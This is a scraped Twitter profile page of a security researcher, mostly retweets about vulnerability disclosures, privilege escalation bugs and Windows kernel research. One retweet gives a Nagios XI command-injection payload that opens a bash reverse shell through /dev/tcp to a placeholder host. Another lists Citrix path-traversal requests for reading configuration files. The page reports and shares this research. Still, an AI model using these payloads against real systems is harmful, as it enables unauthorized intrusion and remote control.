Eviatar Gerzi

@g3rzi

Security Researcher interested in reversing, malware analysis, CTFs, PrivEsc vulns, and DevOps security (docker and k8s) ;)

Vrijeme pridruživanja: studeni 2017.

Tweetovi

Blokirali ste korisnika/cu @g3rzi

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @g3rzi

  1. Prikvačeni tweet
    2. sij

    I was accepted to 2020 with my talk "Compromising Kubernetes Cluster by Exploiting Weak RBAC Permissions" :) It will be on Wednesday, February 26 at 8:00 - 8:50, join me :) Details:

    Poništi
  2. proslijedio/la je Tweet
    prije 22 sata

    CVE-2019-18426  
From Persistent-XSS in Whatsapp to Reading from the File System on Mac/Windows with a potential for RCE

Bounty: $12,500




    Poništi
  3. proslijedio/la je Tweet
    23. sij

    Reliable Datagram Sockets (RDS) rds_atomic_free_op Privilege Escalation...

    Poništi
  4. proslijedio/la je Tweet
    22. sij

    "Local Privilege Escalation in many Ricoh Printer Drivers for Windows (CVE-2019-19363)"

    Poništi
  5. proslijedio/la je Tweet
    1. velj 2019.
    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    18. sij

    Windows kernel explorer: A free powerful Windows kernel research tool

    Poništi
  7. proslijedio/la je Tweet
    17. sij

    Want to make service removal really fun? Create a service with a unicode name. The service will run but won't show in sc.exe, services.msc, or taskmgr.exe and will sometimes cause a critical error while trying to find it with PowerShell/WMI. Unicode wins again.🤦‍♂️

    Prikaži ovu nit
    Poništi
  8. proslijedio/la je Tweet
    6. sij

    -2019-12750: Symantec Endpoint Protection Local Privilege Escalation – Part 2

    Poništi
  9. proslijedio/la je Tweet
    18. sij

    And this is why I wrote my blog post about spoofing named pipe PIDs, no one should be using them as a security enforcement mechanism. Wonder how TinyWall fixed it? :-)

    Poništi
  10. proslijedio/la je Tweet
    22. pro 2019.
    Poništi
  11. proslijedio/la je Tweet
    13. sij

    I've been poking around the Windows kernel a lot lately and one of my favorite samples I've referenced is Mimikatz's driver, Mimidrv. I took some time and documented all of its functions and included some write-ups on important kernel structures. Post: 1/3

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    11. sij

    My courses are going back to GitHub and off of my website. It was really annoying running them on my website. The reverse engineering course is getting a revamp soon and a basic exploit dev course is being worked on.

    Prikaži ovu nit
    Poništi
  13. proslijedio/la je Tweet
    8. sij

    CVE-2019-20197 Nagios XI远程命令执行漏洞 RCE <= v5.6.9 (需要身份认证) http://x.x.x.x/nagiosxi//includes/components/scheduledreporting/schedulereport.php Post : id=a";/bin/bash -l > /dev/tcp/x.x.x.x/8989 0<&1 2>&1;

    Poništi
  14. proslijedio/la je Tweet
    8. sij

    CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcast

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    9. sij

    Have reproduced Citrix SSL VPN pre-auth RCE successfully on both local and remote. Interesting bug!

    Poništi
  16. proslijedio/la je Tweet

    Our researchers found multiple vulnerabilities in TikTok leading to account manipulation

    Poništi
  17. proslijedio/la je Tweet
    3. sij

    Here is an exploit for LPE CVE-2019-1184 in case anybody else is interested in this cool bug:

    Poništi
  18. proslijedio/la je Tweet
    29. pro 2019.
    Poništi
  19. proslijedio/la je Tweet

    PE Import Table hijacking as a way of achieving persistence/exploiting DLL side loading (Christmas blog post 😉):

    Poništi
  20. proslijedio/la je Tweet
    18. pro 2019.
    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·